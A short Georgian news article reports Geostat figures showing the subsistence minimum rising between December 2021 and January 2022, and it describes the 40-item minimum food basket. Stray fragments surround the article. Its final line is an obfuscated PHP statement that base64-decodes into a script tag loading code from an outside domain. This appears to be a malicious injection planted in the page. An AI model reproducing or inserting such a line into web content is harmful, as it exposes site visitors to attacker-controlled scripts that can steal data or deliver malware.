celsiusi
ავერსი შნაიდერი
სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2022 წლის იანვარში, 2021 წელის დეკემბერთან შედარებით, საქართველოში საარსებო მინიმუმის ოდენობა გაიზარდა.
 
2021 წლის დეკემბერში შრომისუნარიანი ასაკის მამაკაცთა საარსებო მინიმუმი 223.7 ლარი იყო, 2022 წლის იანვარში ეს მაჩვენებელი 2.5 ლარით გაიზარდა, ჯამში კი 226.2 ლარი შეადგინა.
 
გასული წლის დეკემბერთან შედარებით, იანვარში 2.4 ლარით არის გაზრდილი საშუალო მომხმარებლის საარსებო მინიმუმი და 200.4 ლარს შეადგენს.
 
უწყების განმარტებით, 2021 წლიდან, ახალ სტატისტიკურ სამუშაოთა პროგრამის შესაბამისად, აღნიშნული მაჩვენებლის წარმოებას საქსტატი აღარ ახორციელებს (იგულისხმება ორსულიანი, სამსულიანი და ა.შ.). როგორც საქსტატში აღნიშნავენ, ეს ინდიკატორი არ გამოიყენება არანაირი დაგეგმვისა და გადაწყვეტილების მიღების პროცესში.
 
სტატისტიკის ეროვნული სამსახური საარსებო მინიმუმს მინიმალური სასურსათო კალათის საფუძველზე ადგენს. მინიმალური სასურსათო კალათა კი შრომისუნარიანი ასაკის მამაკაცის ნორმალური სიცოცხლისა და შრომისუნარიანობისთვის ფიზიოლოგიურად აუცილებელი საკვების რაოდენობას შეიცავს. საარსებო მინიმუმის სასურსათო კალათა შედგება 40 დასახელების პროდუქტისგან – პური, ბურღულეული, ხორცი, რძის პროდუქტები, ბოსტნეული და საკონდიტრო ნაწარმი.
978
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");